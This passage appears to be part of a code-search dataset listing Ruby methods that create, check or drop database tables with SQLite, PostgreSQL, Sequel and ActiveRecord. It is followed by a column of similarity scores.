"def create_initial_table_in_database\n if ScraperWiki.show_tables()[\"swdata\"] == nil\n ScraperWiki.sqliteexecute(\"CREATE TABLE 'swdata' ('date_scraped' text, 'description' text, 'info_url' text, 'council_reference' text, 'address' text, 'comment_url' text, 'page_content' text)\");\n end\nend",
"def create_initial_table_in_database\n if ScraperWiki.show_tables()[\"swdata\"] == nil\n ScraperWiki.sqliteexecute(\"CREATE TABLE 'swdata' ('date_scraped' text, 'description' text, 'info_url' text, 'council_reference' text, 'address' text, 'comment_url' text, 'page_content' text)\");\n end\nend",
"def sqlite3_create_tb(table_name, columns, primary_key, if_not_exist)\n if if_not_exist.downcase == \"n\"\n status = @dbm.table_exist?(table_name)\n @assert.table_already_exist(status, table_name, @dbh)\n end \n\n # Retrieve only the column names\n col_names = columns[0].keys\n\n table_spec_str = '('\n # col: Column name\n # columns[0][col][0]: Column type\n # columns[1][col][1]: Column nullable\n col_names.each {|col|\n col_type = columns[0][col][0]\n @assert.check_type(col_type)\n if col == primary_key\n table_spec_str.concat(\"#{col} #{col_type} PRIMARY KEY NOT NULL,\")\n else\n if columns[0][col][1].downcase == \"no\"\n table_spec_str.concat(\"#{col} #{col_type} NOT NULL,\")\n else\n table_spec_str.concat(\"#{col} #{col_type},\")\n end\n end\n }\n table_spec_str.chomp!(',')\n table_spec_str.concat(')')\n \n create_query = \"CREATE TABLE IF NOT EXISTS #{table_name} #{table_spec_str};\"\n @dbh.execute(create_query)\n\n return create_query + \"\\n\"\n end",
"def run\n ActiveRecord::Base.connection.create_table :not_deleted do |table|\n table.string :name\n end\n false\n end",
"def create_table(table_name)\n # translate into pinyin, then to symbol\n table = trans_pinyin(table_name).to_sym\n DB.create_table table do\n primary_key :id\n String :mid, :unique=>true\n DateTime :created_timestamp\n String :content, :text => true\n String :source\n String :user_id\n String :user_name\n String :user_gender\n Integer :user_status_count\n Integer :user_fansNum\n end\n return table\nend",
"def create_table(table)\r\n if get_tables.include?(table)\r\n puts \"#{table} already exists.\"\r\n else\r\n create_table_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS #{table}(\r\n id INTEGER PRIMARY KEY\r\n SQL\r\n puts \"The table \\'#{table}\\' is now being created.\"\r\n puts \"Let's create the first column!\"\r\n while true\r\n create_table_cmd = add_column(create_table_cmd)\r\n puts \"would you like to add another column?\"\r\n break if get_response == 'no'\r\n end\r\n puts \"Would you like to add a column that references another table?\"\r\n create_table_cmd = add_foreign_keys(create_table_cmd, table) if get_response == 'yes'\r\n create_table_cmd += \");\"\r\n @db.execute(create_table_cmd)\r\n puts \"The table #{table} has been created.\"\r\n end\r\n end",
"def create_schema_sql(name, opts=OPTS)\n \"CREATE SCHEMA #{'IF NOT EXISTS ' if opts[:if_not_exists]}#{quote_identifier(name)}#{\" AUTHORIZATION #{literal(opts[:owner])}\" if opts[:owner]}\"\n end",
"def initialize_schema_migrations_table\n unless table_exists?('schema_migrations')\n execute(\"CREATE TABLE schema_migrations (version string primary key INDEX using plain)\")\n end\n end",
"def initialize_schema_migrations_table\n unless table_exists?('schema_migrations')\n execute(\"CREATE TABLE schema_migrations (version string primary key INDEX using plain)\")\n end\n end",
"def initialize_schema_migrations_table\n unless table_exists?('schema_migrations')\n execute(\"CREATE TABLE schema_migrations (version string primary key INDEX using plain)\")\n end\n end",
"def table_does_not_exist\n exists = table_exists?\n errors.add(:base, :table_exists, {:table_name => to_table}) if exists\n !exists\n end",
"def init_conn_table(table_name)\n # Create destination table\n sql = <<SQL\ndrop table if exists #{table_name};\ncreate table #{table_name} (\n day timestamp, \n id int,\n value int,\n dw_created timestamp,\n dw_updated timestamp\n );\nSQL\n conn.run(sql)\n return conn\n end",
"def create_initial_table_in_database\n\n if ScraperWiki.show_tables()[\"swdata\"] == nil\n\n ScraperWiki.sqliteexecute(\"CREATE TABLE 'swdata' ('date_scraped' text, 'description' text, 'info_url' text, 'council_reference' text, 'address' text, 'comment_url' text, 'page_content' text)\");\n\n end\n\nend",
"def create_initial_table_in_database\n\n if ScraperWiki.show_tables()[\"swdata\"] == nil\n\n ScraperWiki.sqliteexecute(\"CREATE TABLE 'swdata' ('date_scraped' text, 'description' text, 'info_url' text, 'council_reference' text, 'address' text, 'comment_url' text, 'page_content' text)\");\n\n end\n\nend",
"def create_table_statement(table_name, table)\n normalize_primary_key(table)\n add_line \"create_table #{table_name.inspect}#{pretty_hash(table[:table_options])} do\"\n indent do\n output_columns(table[:columns], table[:primary_key])\n output_indexes(table[:indexes])\n output_primary_key(table)\n end\n add_line \"end\"\n end",
"def create_type_of_book(db)\r\n create_type_of_book_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS type_of_book(\r\n type_id INTEGER PRIMARY KEY,\r\n type_name VARCHAR(255)\r\n )\r\n SQL\r\n #create type_of_book table\r\n db.execute(create_type_of_book_cmd)\r\nend",
"def sql_create_table primary_key=nil, drop_first=nil, table_options=''\n str = []\n str << %Q{DROP TABLE IF EXISTS `#{self.table_name}`; } if drop_first\n str << %Q{CREATE TABLE `#{self.table_name}` ( }\n str << self.to_sql\n if primary_key then str.last << ',' ; str << %Q{ PRIMARY KEY \\t(`#{primary_key}`)} ; end\n str << %Q{ ) #{table_options} ;}\n str.join(\"\\n\")\n end",
"def create_table!(*args, &block)\n drop_table(model.table_name)\n create_table(*args, &block)\n end",
"def create_temp_table\n RailsRedshiftReplicator.connection.exec \"CREATE TEMP TABLE #{temporary_table_name} (LIKE #{replication.target_table})\"\n end",
"def create_table(*params)\n connection.create_table(*params) {}\n end",
"def create_versioning_table\n logger.info \"Creating versioning table '_v_#{name}' in the audit schema\"\n db.query(\"CREATE TABLE #{versioning} LIKE #{watched}\")\n db.query(\"ALTER TABLE #{versioning} ADD `_row_version` BIGINT NOT NULL DEFAULT 0\")\n db.query(\"ALTER TABLE #{versioning} DROP PRIMARY KEY, ADD PRIMARY KEY (#{([primary_key] << '_row_version').flatten.join(',')})\")\n\n db.query(\"SHOW CREATE TABLE #{versioning}\").to_a[0]['Create Table'].scan(/UNIQUE KEY `([^`]+)`/).flatten.each do |idx|\n db.query(\"ALTER TABLE #{versioning} DROP INDEX `#{idx}`\")\n end\n end",
"def create_table\n raise \"Need to implement abstract method.\" \n end",
"def create_book_owners(db)\r\n create_book_owners_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_owners(\r\n owner_id INTEGER PRIMARY KEY,\r\n owner_name VARCHAR(255)\r\n )\r\n SQL\r\n #create book_owners table \r\n db.execute(create_book_owners_cmd)\r\nend",
"def create_table\n ActiveRecord::Migration.create_table(table_name) do |t|;end;\n end",
"def table_exists?(table='test_ruby') \n begin\n res = @db.query(\"select * from #{table} where 1=0\")\n return true\n rescue\n return false\n end\n end",
"def create_pruned_table(conn)\n if !conn.list_tables.include?('pruned')\n query = \"CREATE TABLE `pruned` ( `table_name` VARCHAR(64) NOT NULL PRIMARY KEY, `prune_time` DATETIME NOT NULL )\"\n if @dry_run\n verbose query\n else\n conn.query query\n end\n end\n end",
"def create_table?\n db.create_table? :habits do\n primary_key :id\n String :title\n Integer :display_order\n end\n\n db.create_table? :entries do\n primary_key :id\n String :type\n DateTime :timestamp\n foreign_key :habit_id, :habits, on_delete: :cascade\n end\n end",
"def createUserTable(tableName)\n @conn.exec(\"DROP TABLE IF EXISTS #{tableName}\")\n @conn.exec(\"CREATE TABLE #{tableName} (id SERIAL PRIMARY KEY NOT NULL, course_id character varying(255) NOT NULL, name character varying(255), slug character varying(255), course_site character varying(255), instructors character varying(255000), partners character varying(255000), homepage character varying(255000), counter integer not null default 0, url_photo character varying(255000), summary character varying(255000)) WITH (OIDS=FALSE);\");\n end",
"def create_table(table_name, column_definition = {})\n cols = column_definition.to_a.map { |a| a.join(' ') }.join(', ')\n stmt = %{CREATE TABLE \"#{table_name}\" (#{cols})}\n execute(stmt)\n end",
"def create_table(*args, &block)\n db.create_table(name,*args, &block)\n end",
"def create_table(table)\n raise IMDB::DatabaseExceptions::TableExists.new(table.name) if @tables.has_key? table.name\n @tables[table.name] = table\n end",
"def ___create_tbl(tbl)\n return if internal('tables').split(' ').include?(tbl.tid)\n @que.push tbl.create\n verbose { \"'#{tbl.tid}' is created\" }\n end",
"def create_genre(db)\r\n create_genre_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS genre(\r\n genre_id INTEGER PRIMARY KEY,\r\n genre_name VARCHAR(255)\r\n )\r\n SQL\r\n #create table genre\r\n db.execute(create_genre_cmd)\r\nend",
"def create\n\t\tsql = \"CREATE TABLE `#{@table}` (\"\n\t\t@columns.each do |column|\n\t\t\tsql += \"`#{column[:name]}` #{column[:type]}\"\n\t\t\tif(column[:not_null])\n\t\t\t\tsql += ' NOT NULL'\n\t\t\tend\n\n\t\t\tif(column[:primary_key])\n\t\t\t\tsql += ' PRIMARY KEY'\n\t\t\tend\n\n\t\t\tif(column[:auto_increment])\n\t\t\t\tsql += ' AUTOINCREMENT'\n\t\t\tend\n\n\t\t\tif(column[:unique])\n\t\t\t\tsql += ' UNIQUE'\n\t\t\tend\n\t\t\tsql += ','\n\t\tend\n\t\tsql.chop! # Remove trailing ','\n\t\tsql += ');'\n\t\tp sql\n\t\t@db.execute(sql)\n\tend",
"def show_create_table(db, table)\n end",
"def tnTableCreation(tableName)\n pk_list = @pkList.join(',')\n pk_list = \"#{pk_list},branch_name,node_name\"\n q = QueryBuilder.create_tbl(tableName, pk_list, \"select #{@pkSelect}, 0 as test_id,''::varchar(30) as node_name, ''::varchar(30) as branch_name, ''::varchar(5) as type from #{@fTable} f where 1 = 0\")\n # pp q\n DBConn.exec(q)\n\n # q=\"ALTER TABLE #{tableName} add column test_id int, add column node_name varchar(30), add column branch_name varchar(30), add column type varchar(5);\"\n # DBConn.exec(q)\n # pk=@pkList.join(',')\n # # add index\n # q=\"create index ix_#{tableName}t on #{tableName} (#{pk},branch_name);\"\n # pp q\n # DBConn.exec(q)\n end",
"def checkifexists\n que = \" CREATE TABLE IF NOT EXISTS rubicante_logs ( \"\n que += \" id INT UNSIGNED PRIMARY KEY AUTO_INCREMENT, \"\n que += \" timestamp DATETIME, \"\n que += \" nickname VARCHAR(31), \"\n que += \" clienthost VARCHAR(255), \"\n que += \" action VARCHAR(20), \"\n que += \" channel VARCHAR(100), \"\n que += \" msg TEXT \"\n que += \" );\"\n\n # Perform the query! \n @mResource.query(que) \n end",
"def create_table(output, db, table)\n cols = query(db, \"DESCRIBE #{table}\")\n \n output << \"CREATE TABLE #{table} (\\n\"\n cols.each_with_index do |c, i|\n output << \",\\n\" if i > 0\n output << \"\\t#{c[0]} #{c[1]}\"\n output << \" primary key\" if c[3] == \"PRI\"\n output << \" DEFAULT NULL\" if c[2] == \"YES\"\n output << \" DEFAULT #{c[4]}\" if c[2] == \"NO\" && c[3] != \"PRI\"\n output << \" #{c[5]}\" if c[5] != \"\"\n end\n output << \"\\n);\\n\\n\"\n\n return cols\n end",
"def create_book_readers(db)\r\n create_book_readers_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS book_readers(\r\n reader_id INTEGER PRIMARY KEY,\r\n reader_name VARCHAR(255)\r\n )\r\n SQL\r\n #create the table\r\n db.execute(create_book_readers_cmd)\r\nend",
"def create_mysql_table name, columns\n sql = \"CREATE TABLE IF NOT EXISTS `#{name.strip}` (\"\n\n for column in columns.split(',')\n sql << \"`#{column.strip}` VARCHAR(500),\"\n end\n\n sql.gsub!(/,$/, '')\n sql << ')'\n\n ActiveRecord::Base.connection.execute(sql)\nend",
"def define_table(table_name, columns, force)\n if !db_connection.table_exists?(table_name) || force\n db_connection.create_table(table_name, force: true) do |t|\n columns.each do |name, type|\n t.send(type, name)\n end\n end\n end\n end",
"def create_table!\n raise InvalidTableDefinition.new \"#{ self.name } has invalid table configuration\" unless model_table_config_is_valid?\n TinyDyno::Adapter.create_table(create_table_request)\n end",
"def create_authors(db)\r\n create_authors_cmd = <<-SQL\r\n CREATE TABLE IF NOT EXISTS authors(\r\n author_id INTEGER PRIMARY KEY,\r\n author_name VARCHAR(255)\r\n )\r\n SQL\r\n #create authors table\r\n db.execute(create_authors_cmd)\r\nend",
"def create_table( table_name, options = {}, &block )\n super( table_name, options, &block )\n @connection.schema.load_table( table_name.to_s )\n end",
"def define_table(table_name, columns, force)\n if !ActiveRecord::Base.connection.table_exists?(table_name) || force\n ActiveRecord::Base.connection.create_table(table_name, force: true) do |t|\n columns.each do |name, type|\n t.send(type, name)\n end\n end\n end\n end",
"def create_table_sql_list(name, columns, indexes = nil)\n sql = [\"CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def table_exists?\n db.table_exists?(table_name)\n end",
"def cache_table_exists?\n @pg.exec(%{SELECT 1 FROM pg_class WHERE pg_class.relname = '#{@table_name}';}).ntuples.eql?(1)\n end",
"def create_table_sql_list(name, columns, indexes = nil)\n sql = [\"CREATE TABLE #{quote_identifier(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def prepare_db_for_restore\n raise \"restore unimplemented for #{adapter}\" unless (adapter = @db_conf[:adapter]) == 'postgresql'\n query = \"SELECT table_name FROM information_schema.tables WHERE table_schema='public' AND table_type='BASE TABLE'\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n tables = `#{cmd}`\n\n query = \"DROP TABLE #{tables.map(&:chomp).map(&:strip).reject(&:empty?).join(\", \")} CASCADE\"\n cmd = \"psql #{@db_conf[:database]} -t -c \\\"#{query}\\\"\"\n puts \"Executing: '#{cmd}'\"\n `#{cmd}`\n end",
"def create_table(name, &block)\n g = Schema::Generator.new(self, &block)\n create_table_sql_list(name, *g.create_info).each {|sql| execute(sql)}\n end",
"def create_table_as_sql(name, sql, options)\n \"#{create_table_prefix_sql(name, options)} AS (#{sql}) WITH DATA\"\n end",
"def table_exists(dbh, db_name, tbl_name)\n return !dbh.select_one(\"SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES\n WHERE TABLE_SCHEMA = ? AND TABLE_NAME = ?\",\n db_name, tbl_name).nil?\nend",
"def create_table_as_sql(name, sql, options)\n \"#{create_table_prefix_sql(name, options)} AS #{sql}\"\n end",
"def createTable\n\t\tstm = @db.prepare \"CREATE TABLE IF NOT EXISTS leituras (\n\t\t\t\tIDCLIENTE INT NOT NULL,\n\t\t\t\tIDSENSOR INT NOT NULL,\n\t\t\t\tVALUE INT NOT NULL,\n\t\t\t\tGPSX INT NOT NULL,\n\t\t\t\tGPSY INT NOT NULL,\n\t\t\t\tTIMESTAMP TEXT NOT NULL\n\t\t\t);\"\n\n\t\trs = stm.execute\n\t\trs.close\n\tend",
"def createurlTable\n @conn.exec(\"CREATE TABLE urls (uid serial NOT NULL, loc character varying(255), CONSTRAINT urls_pkey PRIMARY KEY (uid)) WITH (OIDS=FALSE);\");\n end",
"def ensure_present!(create_if_needed)\n return unless @low_card_model.table_exists?\n\n current_name = current_unique_all_columns_index_name\n return true if current_name\n\n if create_if_needed\n create_unique_index!\n true\n else\n message = %{You said that the table '#{low_card_model.table_name}' is a low-card table.\nHowever, it currently does not seem to have a unique index on all its columns. For the\nlow-card system to work properly, this is *required* -- although the low-card system\ntries very hard to lock tables and otherwise ensure that it never will create duplicate\nrows, this is important enough that we really want the database to enforce it.\n\nWe're looking for an index on the following columns:\n\n #{value_column_names.sort.join(\", \")}\n\n...and we have the following unique indexes:\n\n}\n current_unique_indexes.each do |unique_index|\n message << \" '#{unique_index.name}': #{unique_index.columns.sort.join(\", \")}\\n\"\n end\n message << \"\\n\"\n\n raise LowCardTables::Errors::LowCardNoUniqueIndexError, message\n end\n end",
"def create_table_sql_list(name, columns, indexes = nil, options = {})\n sql = [\"CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})\"]\n sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?\n sql\n end",
"def create_table_sql(name, generator, options)\n unless supports_named_column_constraints?\n # Split column constraints into table constraints if they have a name\n generator.columns.each do |c|\n if (constraint_name = c.delete(:foreign_key_constraint_name)) && (table = c.delete(:table))\n opts = {}\n opts[:name] = constraint_name\n [:key, :on_delete, :on_update, :deferrable].each{|k| opts[k] = c[k]}\n generator.foreign_key([c[:name]], table, opts)\n end\n if (constraint_name = c.delete(:unique_constraint_name)) && c.delete(:unique)\n generator.unique(c[:name], :name=>constraint_name)\n end\n if (constraint_name = c.delete(:primary_key_constraint_name)) && c.delete(:primary_key)\n generator.primary_key([c[:name]], :name=>constraint_name)\n end\n end\n end\n\n unless can_add_primary_key_constraint_on_nullable_columns?\n if pk = generator.constraints.find{|op| op[:type] == :primary_key}\n pk[:columns].each do |column|\n if matched_column = generator.columns.find{|gc| gc[:name] == column}\n matched_column[:null] = false\n end\n end\n end\n end\n\n \"#{create_table_prefix_sql(name, options)} (#{column_list_sql(generator)})\"\n end"
] |
[
"0.8169112",
"0.81165934",
"0.74088",
"0.7350597",
"0.7100451",
"0.7100451",
"0.7086276",
"0.6980296",
"0.6929266",
"0.68034923",
"0.6684206",
"0.66616875",
"0.65244293",
"0.6499984",
"0.64946395",
"0.6465946",
"0.6458165",
"0.64432794",
"0.64391005",
"0.6437936",
"0.64346486",
"0.6422509",
"0.64203787",
"0.64019585",
"0.63882905",
"0.6379815",
"0.6361446",
"0.6354551",
"0.63165635",
"0.6314898",
"0.6310776",
"0.63069266",
"0.6306087",
"0.6279063",
"0.6232852",
"0.6231137",
"0.6229414",
"0.6207805",
"0.6198854",
"0.61946595",
"0.618341",
"0.6168873",
"0.6168873",
"0.61674315",
"0.61359364",
"0.6133217",
"0.6120772",
"0.61140877",
"0.61110294",
"0.61110294",
"0.61110294",
"0.6106355",
"0.6097211",
"0.6091356",
"0.6091356",
"0.60484177",
"0.6045582",
"0.60398215",
"0.60372597",
"0.6033315",
"0.60304487",
"0.59833133",
"0.59481025",
"0.59459525",
"0.59411556",
"0.5927925",
"0.5920493",
"0.5920079",
"0.59193206",
"0.5913368",
"0.5909388",
"0.59035623",
"0.5886797",
"0.58852226",
"0.5881762",
"0.58790326",
"0.58624333",
"0.5855874",
"0.5842527",
"0.5840187",
"0.58334184",
"0.58215475",
"0.5814891",
"0.58146495",
"0.5805142",
"0.57996786",
"0.57828605",
"0.5736525",
"0.5735255",
"0.5734583",
"0.57308936",
"0.572715",
"0.5723927",
"0.571836",
"0.57181066",
"0.5716473",
"0.57164556",
"0.5712073",
"0.570689",
"0.56986725"
] |
0.7571522
|
2
|
PostgreSQL 9.0+ supports some types of deferrable constraints beyond foreign key constraints.
|
def supports_deferrable_constraints?
server_version >= 90000
end
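For context, a minimal Sequel sketch (assuming the Sequel gem, a PostgreSQL 9.0+ server, and a hypothetical connection URL) of what this capability gates: on 9.0+, non-foreign-key constraints such as UNIQUE can also be declared DEFERRABLE, so the check runs at COMMIT instead of per statement.

require 'sequel'

DB = Sequel.connect('postgres://localhost/mydb') # hypothetical connection URL

DB.create_table?(:accounts) do
  primary_key :id
  String :email
  # deferrable: true renders the UNIQUE constraint as
  # DEFERRABLE INITIALLY DEFERRED, so uniqueness is verified at COMMIT,
  # which permits e.g. swapping two email values inside one transaction.
  unique [:email], deferrable: true
end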
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def supports_deferrable_foreign_key_constraints?\n true\n end",
"def supports_deferrable_foreign_key_constraints?\n true\n end",
"def supports_deferrable_foreign_key_constraints?\n supports_deferrable_constraints?\n end",
"def supports_deferrable_constraints?\n false\n end",
"def supports_deferrable_constraints?\n false\n end",
"def supports_external_drop_constraints?() true; end",
"def can_add_primary_key_constraint_on_nullable_columns?\n true\n end",
"def supports_external_drop_constraints?() false; end",
"def foreign_key_constraints_enabled?\n @disable_foreign_key_constraints != true\n end",
"def constraints(_)\n nil\n end",
"def supports_foreign_keys?\n false\n end",
"def supports_foreign_keys?\n false\n end",
"def foreign_key_present?\n false\n end",
"def foreign_key_present?\n false\n end",
"def coerce_constraint_definition(defn)\n defn = coerce_symbolized_hash(defn)\n defn[:type] = coerce_name(defn[:type])\n \n case type = defn[:type]\n when :primary_key, :candidate_key\n has_exactly_hash_keys!(defn, :type, :attributes)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n when :foreign_key\n if defn.key?(:key)\n has_exactly_hash_keys!(defn, :type, :attributes, :references, :key)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n defn[:references] = coerce_name(defn[:references])\n defn[:key] = coerce_name(defn[:key])\n else\n has_exactly_hash_keys!(defn, :type, :attributes, :references)\n defn[:attributes] = coerce_attribute_names(defn[:attributes], true)\n defn[:references] = coerce_name(defn[:references])\n end\n else\n invalid!(\"unknown constraint type #{type}\")\n end\n defn\n end",
"def invalid_alter_table_type?(type, options)\n type.to_sym == :primary_key || options[:primary_key] ||\n options[:null] == false && options[:default].nil?\n end",
"def supports_foreign_keys_in_create?\n supports_foreign_keys?\n end",
"def constraints; end",
"def constraints; end",
"def constraints; end",
"def valid_alter_table_options( type, options )\n type.to_sym != :primary_key\n end",
"def stores_foreign_key?; false; end",
"def stores_foreign_key?; false; end",
"def _check_constraints_ds\n @_check_constraints_ds ||= metadata_dataset.\n from{pg_constraint.as(:co)}.\n left_join(Sequel[:pg_attribute].as(:att), :attrelid=>:conrelid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).\n where(:contype=>'c').\n select{[co[:conname].as(:constraint), att[:attname].as(:column), pg_get_constraintdef(co[:oid]).as(:definition)]}\n end",
"def supports_external_add_constraints?() false; end",
"def implementation_no_master_association\n defined?(foreign_key_name) && foreign_key_name.blank?\n end",
"def is_constraint?(trigger_definition)\n !!(trigger_definition =~ /^CREATE CONSTRAINT TRIGGER/)\n end",
"def constraints\n super\n end",
"def foreign_key_default\n nil\n end",
"def foreign_key?\n false\n end",
"def check_all_foreign_keys_valid!\n end",
"def supports_foreign_tables?\n false\n end",
"def supports_foreign_tables?\n false\n end",
"def supports_validate_constraints?\n false\n end",
"def supports_validate_constraints?\n false\n end",
"def supports_external_add_constraints?() true; end",
"def constraint_deferrable_sql_append(sql, defer)\n case defer\n when nil\n when false\n sql << ' NOT DEFERRABLE'\n when :immediate\n sql << ' DEFERRABLE INITIALLY IMMEDIATE'\n else\n sql << ' DEFERRABLE INITIALLY DEFERRED'\n end\n end",
"def supports_check_constraints?\n false\n end",
"def create_table_with_constraints(*_)\n raise <<~EOM\n #create_table_with_constraints is not supported anymore - use #create_table instead, for example:\n\n create_table :db_guides do |t|\n t.bigint :stars, default: 0, null: false\n t.text :title, limit: 128\n t.text :notes, limit: 1024\n\n t.check_constraint 'stars > 1000', name: 'so_many_stars'\n end\n\n See https://docs.gitlab.com/ee/development/database/strings_and_the_text_data_type.html\n EOM\n end",
"def all_foreign_keys_valid?\n check_all_foreign_keys_valid!\n true\n rescue ActiveRecord::StatementInvalid\n false\n end",
"def foreign_key?\n true\n end",
"def preconditions\n ActiveRecord::VERSION::MAJOR >= 6 &&\n Helper.postgresql? &&\n primary_field? &&\n column.sql_type.to_s.match(TARGET_COLUMN_TYPE)\n end",
"def foreign_key_list(table, opts=OPTS)\n super\n rescue Sequel::DatabaseError => e\n raise unless foreign_key_error?(e)\n []\n end",
"def check_add_foreign_key(*args)\n options = args.extract_options!\n from_table, to_table = args\n\n validate = options.fetch(:validate, true)\n if postgresql? && validate\n if StrongMigrations.safe_by_default\n safe_add_foreign_key(*args, **options)\n throw :safe\n end\n\n raise_error :add_foreign_key,\n add_foreign_key_code: command_str(\"add_foreign_key\", [from_table, to_table, options.merge(validate: false)]),\n validate_foreign_key_code: command_str(\"validate_foreign_key\", [from_table, to_table])\n end\n end",
"def test_add_invalid_foreign_key\n @connection.add_foreign_key :astronauts, :rockets, column: \"rocket_id\", validate: false\n\n foreign_keys = @connection.foreign_keys(\"astronauts\")\n assert_equal 1, foreign_keys.size\n\n fk = foreign_keys.first\n assert_predicate fk, :validated?\n end",
"def supports_named_column_constraints?\n true\n end",
"def stores_foreign_key?; true; end",
"def check_add_foreign_key(*args); end",
"def create_constraints(drop = nil)\n contraints = {\n \"Page\" => [:page_id],\n \"Term\" => [:uri]\n }\n contraints.each do |label, fields|\n fields.each do |field|\n begin\n name = 'o'\n name = label.downcase if drop && drop == :drop\n query(\n \"#{drop && drop == :drop ? 'DROP' : 'CREATE'} CONSTRAINT ON (#{name}:#{label}) ASSERT #{name}.#{field} IS UNIQUE;\"\n )\n rescue Neography::NeographyError => e\n raise e unless e.message =~ /already exists/ || e.message =~ /No such constraint/\n end\n end\n end\n end",
"def foreign_key_constraint(from_table, from_column, options = {})\n to_table = options[:to_table] || from_column.to_s[/^(.+)_id$/, 1].tableize\n on_delete = case options[:on_delete]\n when :cascade; 'cascade'\n when :nullify; 'set null'\n end\n on_update = case options[:on_update]\n when :cascade; 'cascade'\n when :nullify; 'set null'\n when :restrict; 'restrict'\n end\n cmd = [ \"constraint #{constraint_name from_table, from_column}\",\n \"foreign key (#{from_column})\",\n \"references #{ActiveRecord::Base.connection.quote_table_name to_table}(id)\",\n ]\n cmd << \"on delete #{on_delete}\" if on_delete\n cmd << \"on update #{on_update}\" if on_update\n cmd.join(' ')\n end",
"def preconditions\n !column.null && column.default.nil? && !primary_field? && !timestamp_field? && !column.default_function\n end",
"def remove_foreign_key(from_table, from_column, to_table)\n constraint_name = \"fk_#{from_table}_#{from_column}\"\n # check if constraint already exist\n count = ActiveRecord::Base.connection.select_value(\"select count(1) from pg_constraint where conname='#{constraint_name}'\")\n\n unless count.to_i == 0\n execute %{ALTER TABLE #{from_table} DROP CONSTRAINT #{constraint_name}}\n end\n end",
"def dump_add_fk_constraints(table, fks)\n sfks = String.new\n sfks << \"alter_table(#{table.inspect}) do\\n\"\n sfks << create_table_generator do\n fks.sort_by{|fk| fk[:columns]}.each do |fk|\n foreign_key fk[:columns], fk\n end\n end.dump_constraints.gsub(/^foreign_key /, ' add_foreign_key ')\n sfks << \"\\nend\"\n end",
"def test_adding_bears_to_the_farm_with_t_dot_foreign_key_farm_dependent_nullify\n premigrate\n table = \"bears\"\n migrate table\n assert_match(/FOREIGN KEY \\(\\\"farm_id\\\"\\) REFERENCES \\\"farms\\\"\\(id\\) ON DELETE SET NULL/, schema(table))\n end",
"def foreign_key?\n @ref_table ? true : false\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def constraint_name(table_name, relationship_name)\n \"#{table_name}_#{relationship_name}_fk\"\n end",
"def create_constraints_statement(table_name, constraint_name, keys, foreign_table, foreign_keys, delete_constraint_type)\n <<-EOS.compress_lines\n ALTER TABLE #{quote_table_name(table_name)}\n ADD CONSTRAINT #{quote_constraint_name(constraint_name)}\n FOREIGN KEY (#{keys * ', '})\n REFERENCES #{quote_table_name(foreign_table)} (#{foreign_keys * ', '})\n ON DELETE #{delete_constraint_type}\n ON UPDATE #{delete_constraint_type}\n EOS\n end",
"def build_constraints\n Schema::Logical::Constraint.new\n end",
"def quote_constraint_name(foreign_key)\n quote_table_name(foreign_key)\n end",
"def setup_auto_validations\n not_null_cols, explicit_not_null_cols = db_schema.select{|col, sch| sch[:allow_null] == false}.partition{|col, sch| sch[:default].nil?}.map{|cs| cs.map{|col, sch| col}}\n @auto_validate_not_null_columns = not_null_cols - Array(primary_key)\n explicit_not_null_cols += Array(primary_key)\n @auto_validate_explicit_not_null_columns = explicit_not_null_cols.uniq\n @auto_validate_max_length_columns = db_schema.select{|col, sch| sch[:type] == :string && sch[:max_length].is_a?(Integer)}.map{|col, sch| [col, sch[:max_length]]}\n table = dataset.first_source_table\n @auto_validate_unique_columns = if db.supports_index_parsing? && [Symbol, SQL::QualifiedIdentifier, SQL::Identifier, String].any?{|c| table.is_a?(c)}\n db.indexes(table).select{|name, idx| idx[:unique] == true}.map{|name, idx| idx[:columns].length == 1 ? idx[:columns].first : idx[:columns]}\n else\n []\n end\n end",
"def constraint_definition_sql(constraint)\n sql = String.new\n sql << \"CONSTRAINT #{quote_identifier(constraint[:name])} \" if constraint[:name] \n case constraint[:type]\n when :check\n check = constraint[:check]\n check = check.first if check.is_a?(Array) && check.length == 1\n check = filter_expr(check)\n check = \"(#{check})\" unless check[0..0] == '(' && check[-1..-1] == ')'\n sql << \"CHECK #{check}\"\n when :primary_key\n sql << \"#{primary_key_constraint_sql_fragment(constraint)} #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << column_references_table_constraint_sql(constraint.merge(:deferrable=>nil))\n when :unique\n sql << \"#{unique_constraint_sql_fragment(constraint)} #{literal(constraint[:columns])}\"\n else\n raise Error, \"Invalid constraint type #{constraint[:type]}, should be :check, :primary_key, :foreign_key, or :unique\"\n end\n constraint_deferrable_sql_append(sql, constraint[:deferrable])\n sql\n end",
